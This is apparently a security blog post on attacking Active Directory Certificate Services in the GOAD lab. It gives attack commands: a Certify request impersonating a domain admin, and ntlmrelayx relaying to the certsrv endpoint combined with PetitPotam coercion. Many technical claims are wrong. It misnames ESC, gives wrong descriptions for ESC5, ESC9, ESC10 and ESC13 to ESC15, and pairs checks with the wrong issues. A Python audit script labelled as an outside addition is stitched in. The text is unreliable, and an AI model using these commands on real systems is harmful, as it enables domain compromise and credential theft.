GOAD – part – ADCS

Active Directory Certificate Services (ADCS) is a critical component in Windows environments, often targeted during penetration testing and red team engagements. This article explores common vulnerabilities and misconfigurations in ADCS, specifically focusing on ESC (Elevation of Service Control) vulnerabilities like ESC5, ESC7, ESC9, ESC10, ESC11, ESC13, ESC14, and ESC15.

You Should Know:

1. Understanding ADCS Vulnerabilities

ADCS provides PKI (Public Key Infrastructure) services in Windows domains. Misconfigurations can lead to privilege escalation, credential theft, and domain compromise. Below are key exploits and their mitigation steps.

2. Exploiting ESC5 (Misconfigured Certificate Templates)

ESC5 occurs when low-privileged users can enroll in certificate templates that allow domain escalation.

Commands to Check Vulnerable Templates:

Get-ADObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=local" -Filter * -Properties * | Select-Object Name, msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag, msPKI-Private-Key-Flag

Exploitation:

If a template allows `ENROLLEE_SUPPLIES_SUBJECT` and permits client authentication, an attacker can request a certificate for a high-privileged account.
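The following audit routine is an added example, not code from the original post or from GOAD: it applies the check described above to template records in the shape the LDAP query returns, flagging only templates where every condition holds at once (enrollee supplies the subject, an authentication EKU, no manager approval, no authorized signatures, and a low-privileged enrollment principal). The sample records, the `enroll` list and the `LOW_PRIV_PRINCIPALS` set are constructed assumptions.

```python
# Bit values taken from the msPKI-Certificate-Name-Flag and msPKI-Enrollment-Flag attributes
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # msPKI-Enrollment-Flag: manager approval

# EKU OIDs that let a certificate be used to authenticate as its subject
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",        # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",   # Smart Card Logon
    "1.3.6.1.5.2.3.4",          # PKINIT Client Authentication
    "2.5.29.37.0",              # Any Purpose
}

# Assumed set of principals treated as low-privileged for this audit; extend per domain
LOW_PRIV_PRINCIPALS = {"Authenticated Users", "Domain Users", "Domain Computers", "Everyone"}


def permits_authentication(ekus):
    """An empty EKU list means the certificate is valid for any purpose, so it counts too."""
    return not ekus or bool(set(ekus) & AUTH_EKUS)


def template_findings(template):
    """Return the conditions met by the template; only the full combination is reported."""
    findings = []
    if template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        findings.append("enrollee supplies subject")
    if permits_authentication(template["pKIExtendedKeyUsage"]):
        findings.append("authentication EKU")
    if not template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        findings.append("no manager approval")
    if template["msPKI-RA-Signature"] == 0:
        findings.append("no authorized signatures required")
    if set(template["enroll"]) & LOW_PRIV_PRINCIPALS:
        findings.append("low-privileged enrollment")
    return findings if len(findings) == 5 else []


def audit(templates):
    """Map each abusable template name to the reasons it was flagged."""
    result = {}
    for t in templates:
        findings = template_findings(t)
        if findings:
            result[t["name"]] = findings
    return result


# Constructed sample records (values are illustrative, not from a real domain)
SAMPLE_TEMPLATES = [
    {"name": "User", "msPKI-Certificate-Name-Flag": 0xA6000000, "msPKI-Enrollment-Flag": 0x29,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Domain Users"]},
    {"name": "VulnTemplate", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Authenticated Users"]},
    {"name": "ApprovedTemplate", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x2,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Authenticated Users"]},
]

if __name__ == "__main__":
    for name, why in audit(SAMPLE_TEMPLATES).items():
        print(f"{name}: {', '.join(why)}")
```

Feed it the real attribute values from the `Get-ADObject` query above; a template that trips only some conditions (for example `ApprovedTemplate`, which is gated by manager approval) is deliberately not reported.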

3. Exploiting ESC7 (CA Server Misconfigurations)

ESC7 involves abusing CA server permissions, allowing unauthorized certificate issuance.

Check CA Permissions:

certutil -config "CA_SERVER\CA_NAME" -getreg "reg\PolicyModules"

Exploit via Certify:

Certify.exe request /ca:CA_SERVER\CA_NAME /template:VULNERABLE_TEMPLATE /altname:DOMAIN_ADMIN
4. ESC9 & ESC10 (NTLM Relay to ADCS HTTP Endpoints)

ESC9/10 allow NTLM relay attacks against ADCS HTTP endpoints.

Exploitation Steps:

1. Start an NTLM relay attack using ntlmrelayx:

ntlmrelayx.py -t http://CA_SERVER/certsrv/certfnsh.asp -smb2support --adcs --template ESC9_Template

2. Coerce authentication via PetitPotam or PrinterBug.

5. ESC11 (RPC Misconfigurations)

ESC11 abuses RPC interfaces to manipulate certificate requests.

Check Vulnerable Interfaces:

Get-CertificationAuthority | Select-Object ConfigString, Name
6. ESC13, ESC14, & ESC15 (Certificate Chain Abuse)

These involve abusing certificate chain trust relationships.

Verify Certificate Chains:

openssl x509 -in cert.pem -text -noout

Mitigation Strategies

  • Restrict enrollment rights on certificate templates.
  • Disable NTLM authentication where possible.
  • Monitor CA server logs for unusual requests.
  • Apply Microsoft patches for known ADCS vulnerabilities.

What Undercode Says

ADCS is a goldmine for attackers if misconfigured. Regular audits, least-privilege principles, and monitoring are essential. Below are additional hardening commands:

Linux (for PKI Analysis):

openssl s_client -connect CA_SERVER:443 -showcerts

Windows (Audit CA Logs):

Get-WinEvent -LogName "Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational"

Expected Output:

A secure ADCS setup with no unauthorized enrollments and strict template permissions.

Reference:

GOAD – ADCS Exploitation

Reported By: Florian Hansemann – Hackers Feeds